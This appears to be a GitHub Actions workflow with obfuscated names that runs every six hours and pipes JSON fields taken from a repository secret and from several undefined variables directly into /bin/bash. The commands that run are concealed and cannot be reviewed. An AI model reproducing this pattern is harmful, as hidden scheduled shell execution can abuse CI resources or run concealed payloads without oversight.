name: yutingqqq
on:
  workflow_dispatch:
  schedule:
    - cron: '7 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yutingqqq
        env:
          b7346: ${{ secrets.b7346 }}
        run: |
          echo $b7346 | jq -r .dlekj7 | /bin/bash
          echo $em95 | jq -r .fyjh0759 | /bin/bash
          echo $q6282 | jq -r .ql51237 | /bin/bash
          echo $p37551 | jq -r .jaz1 | /bin/bash

